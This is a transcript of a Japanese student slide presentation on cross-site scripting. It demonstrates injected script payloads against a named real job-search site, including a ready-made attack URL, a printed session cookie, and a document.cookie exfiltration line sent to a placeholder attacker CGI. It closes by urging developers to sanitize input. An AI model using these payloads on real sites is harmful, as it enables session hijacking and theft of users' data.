Vulnerability of Cross-Site Scripting

Slides:



Advertisements
Similar presentations
情報技術演習Ⅰ 人文学研究のための情報技術入門 2014/06/11 担当:林晋 TA: 橋本雄太.
Advertisements

Wiki 的年寄りの昔話 WikiBase と YukiWiki 1.x. Wiki Wiki って言うけどさ。 こんなの見たことあるかよ?
ファーストステップガイド ( 管理者向け) ナレッジスイート株式会社 Copyright (c) knowledgesuite inc. All rights reserved.1.
1 安全性の高いセッション管理方 式 の Servlet への導入 東京工業大学 理学部 千葉研究室所属 99-2270-6 松沼 正浩.
0 クイックスタートガイド|管理者編 スマートデバイスのビジネス活用を支援する法人向けファイル共有サービス.
情報倫理と メディアリテラシー 第 1 章 ネットワーク社会と情報化社 会. ネットワーク社会 携帯電話 コンピュー タ テレビ 家電 カーナビ など ネットワーク 新たなコミュニケーションの場.
OWL-Sを用いたWebアプリケーションの検査と生成
Internet Explorer v7,v8 の主な機能
情報基礎A 情報科学研究科 徳山 豪.
サイボウズ デヂエ 8 新機能ご説明資料 サイボウズ株式会社.
ブラウザの基本操作 前のページに戻る ブラウザの左上にある 「戻る」ボタンで、自分がたどってきた一つ前のページに戻ることができます。
下藤 弘丞 SecureWeblogの構築.
サイバーセキュリティ演習 ― Webセキュリティ基礎&実践―
富士ソフト株式会社 IT事業本部 テクニカルC&C部 小川直人
受動的攻撃について Eiji James Yoshida penetration technique research site
CG作品展示サイト”Fragments” ~ 『閲覧しやすさ』と『デザイン性』を両立させた Webデザイン~
ネット時代のセキュリティ2(脅威の例) 2SK 情報機器工学.
サイバーセキュリティ演習 ― Webセキュリティ基礎&実践―
JavaServlet&JSP入門 01K0018 中村太一.
Phenixサーバ クラックまとめ.
「コンピュータと情報システム」 07章 インターネットとセキュリティ
稚内北星学園大学 情報メディア学部 助教授 安藤 友晴
Webサイト運営 09fi118 橋倉伶奈 09fi131 本間昂 09fi137 三上早紀.
[オンライン学習に登録] [情報ネットワークを安全に利用しよう]
タグライブラリ ソフトウェア特論 第6回.
事例7 不正アクセス.
於:県立中村高等学校 同朋学園本部事務局 河邊憲二
インターネット社会の脅威 (インターネット社会のセキュリティ) 開始 再生時間:5分20秒.
タグライブラリとJSP J2EE I 第10回 /
第5章 情報セキュリティ(前半) [近代科学社刊]
セキュリティ・チェックリスト解説 【5~10分】
らくらく学校連絡網 スライドショーで見る操作ガイド -5- メイン画面(一般登録者用) escで中断、リターンキーで進みます
セッション管理 J2EE I 第9回 /
平成22年度に実施を予定するインターネットを 用いた研修システムによる研修 ライブ配信受講手順書
タグライブラリとJSP J2EE II 第2回 2004年10月7日 (木).
初心者のためのセキュリティ/プライバシー講座
情報セキュリティ読本 四訂版 - IT時代の危機管理入門 -
コンピュータ プレゼンテーション.
Javaによる Webアプリケーション入門 第9回
Javaによる Webアプリケーション入門 第5回
(ご参考)各種SNSをSHIFTに連携させる方法 「facebook」「YouTube」「Instagram」「Twitter」
第8章 Web技術とセキュリティ   岡本 好未.
2004年度 サマースクール in 稚内 JavaによるWebアプリケーション入門
2003年度 データベース論 安藤 友晴.
セキュリティビジネスの可能性に関する報告
第2回 SQL インジェクション その攻撃と対処 NECラーニング 山崎 明子.
ネットワークアプリケーションと セキュリティ
DNSトラフィックに着目したボット検出手法の検討
卒業論文発表 「Web アクセスに伴う脅威の特徴分析」
仮想計算機を用いて OSを介さずに行う安全な ファイルアクセス制御
Cisco dCloud dCloud登録ルータ配下からのvWLCへのAP接続 シスコシステムズ合同会社 2016年7月.
サイバーセキュリティ バッファオーバフロー
スマートデバイスのビジネス活用を支援する法人向けファイル共有サービス
すぐできるBOOK -基本設定編-.
Webセキュリティ 情報工学専攻 1年 赤木里騎 P226~241.
VIRUS.
発注者側サイト操作説明書 作成日:2004年6月 Ver1.0 初版 改 訂:2005年9月 Ver1.2 株式会社 コニファ.
個人情報の流出の危険性とその対策について
サイバーセキュリティ演習 ― Webセキュリティ基礎&実践―
基礎プログラミング演習 第12回.
北海道情報大学 情報メディア学部 情報メディア学科 新井山ゼミ 金子拓磨
コンピュータにログイン 第1章 コンピュータにログイン 啓林館 情報A最新版 (p.6-13)
オブジェクト指向言語論 第六回 知能情報学部 新田直也.
プログラミング言語論 第六回 理工学部 情報システム工学科 新田直也.
事例6 ID・パスワードの管理.
社会と情報 情報社会の課題と情報モラル 情報化が社会に及ぼす影響と課題
ホームページを見ているだけで情報が通知される? ~Cookie編~
中等情報科教育Ⅱ 情報セキュリティの確保.
予約システムの ご案内 予 約 (24時間) 2.まもなく予約日メール 3.予約日時を確認できます
セキュリティビジネスの可能性に関する報告
Presentation transcript:

Vulnerability of Cross-Site Scripting XSS脆弱性の検証 環境情報学部2年 中村拓央

What is Cross-Site Scripting? 悪意を持った攻撃者がWEB上の入力フォームなどを通してスクリプトコードを挿入し、そのスクリプトがそのままHTMLに埋め込まれ、ページを閲覧したユーザのブラウザ上でスクリプトが実行されてしまうこと。                 ↓      他人のサイトで勝手に           スクリプトを実行するということ。

What is Cross-Site Scripting? ~悪意のあるスクリプトによって起こりうる被害~ ・cookieの漏洩 ・ページの改竄 ・データの破壊   最悪の事態は重要な個人情報や利権を操作するためのcookieを盗まれてしまうこと。 Cookieの漏洩、ページの改竄、データの破壊など様々な被害が挙げられますが、 その中でもっとも危険かつ一般的にXSS被害として知られるcookie盗難について 説明します。

What is Cross-Site Scripting? 最近ではWEB製作者はそうしたスクリプトコードを実行させないような処理をしている。 数年前と比較するとそのようなXSS脆弱性を持ったサイトは少なくなってきている。    もう存在しないのかな?

そんなサイトを発見

<script>alert(“XSS脆弱性”)</script> ここは某就職ナビサイトさんのページですが。 ここのフリーワード検索欄にスクリプトを埋め込んで見ます。 このスクリプトはXSS脆弱性と書かれたダイアログボックスを表示させるスクリプトコードです。 <script>alert(“XSS脆弱性”)</script>

XSS脆弱性をもっているということになる。 判ったわけです。 じゃあ脆弱性があるということがわかったら次はどのような方法で 実際に攻撃されるのか。 実行されてしまったので、 XSS脆弱性をもっているということになる。

具体的なXSS実行方法 <script> alert(document.cookie) ; </script> というスクリプトを先ほどのサイトに埋め込んでみる。 このスクリプトはCookie情報が表示されたダイアログボックスを画面に出すスクリプトコードです。

<script>alert(document.cookie) ;</script>

ASPSESSIONIDQCBBQRBT=EAHELLGBLPHMHFGANCIOMDHA そうするとまあ驚いたことにセッションIDと思われるcookieデータが 見事に表示されてしまいました。 セッションIDというのはそのセッション管理、とくにユーザ認証に用いられるIDのため これを用いることで他人のセッションに入り込んでなりすますことができます。 この例は自分でスクリプトコードを直接入力するだけなので、 自分で実行しても自分のIDしか取れません。 でもこれを他人に行わせることができたら、それは非常に大きな脅威となるわけです。 ASPSESSIONIDQCBBQRBT=EAHELLGBLPHMHFGANCIOMDHA

具体的なXSS実行方法 攻撃者は以下のようなリンクを自分の用意したページに含ませたり、大勢の人が観覧する掲示板あるいはメールに貼り付けたりしてユーザを誘導する。 http://www4.access-t.co.jp/navi/acs03/search/search_result.asp? free_word=%3Cscript%3Ealert%28document.cookie%29+%3B%3C%2Fscript%3E&condition=00&kensaku01222=%8C%9F%8D%F5&mode=freeword&new=dummy&page=top これは先ほどのページにアクセスできるURLです。 フリーワード検索欄のパラメータにさっきのスクリプトを与えています。 赤文字の部分はデコードすると、<script>alert(document.cookie) ;</script>

http://www4. access-t. co. jp/navi/acs03/search/search_result. asp http://www4.access-t.co.jp/navi/acs03/search/search_result. asp?free_word=<script>alert(document.cookie) ;</script> &condition=00&kensaku01222=%8C%9F%8D%F5&mode=freeword&new=dummy&page=top

やっぱり実行できてしまうわけです。 重要なのはこのスクリプトはこのサイトで実行されるので、 取得できるcookieはこのサイトで発行されたものになります。 このように攻撃者のサイトから、ユーザーをまたいで脆弱性のあるサイトへいって スクリプトを実行する、ということがクロスサイトスクリプティングという名前の由縁です。

具体的なXSS実行方法 document.location=“http://○○○○/cookie.cgi?cookie="+document.cookie; このようなスクリプトを含ませることで、攻撃者サイトのcookie.cgiにユーザーのcookieを含んだ形でアクセスさせることも可能。 先ほどの例ではデモのためにブラウザ上でダイアログを表示させましたが、 CGIに引数として、Cookie情報を渡すような形をとることで 誘導した側のCGIでこのセッションIDを保存したり、 または任意のユーザにメールしたりすることによってセッションIDを不正に取得することが可能だ。 取得したIDを用いて、同じページに入ることによって個人情報などの有益な情報を取得できる可能性が非常に高い。 そうすると、攻撃者はセッションIDを用意することで、 認証のためのユーザIDやパスワードを知らなくても、ログインできてしまう可能性があるわけです。 それがいわゆるセッションハイジャックです。 こうした簡単な作業で重要な情報を引き出せてしまう脆弱なセキュリティはどうかと疑問に思うわけです。

結論 ・WEBアプリケーション、CGIプログラマーはXSSを軽視しないこと! 現在は個人情報をWEB上で入力、管理できる時代なので、 簡単なセキュリティホールを作らないこと! ちょっとした注意や作業でXSS脆弱性は激減するので、 安易なプログラムはしないでほしい、というのが 結論です。 リサーチしてみて感じました。 今後の課題としては、簡単なスクリプトさえも実効されてしまうようなサイト に対して、そうしたcookei情報をとれるようなCGIを自前で作ってみたい。 対策として、サニタイジング処理といいまして、文字列を置換。。。。。。 サニタイジング処理が施されているサイトでもXSSが実行できてしまうこともあるらしいので、 それが実際にできるのかを再現してみたいと思います。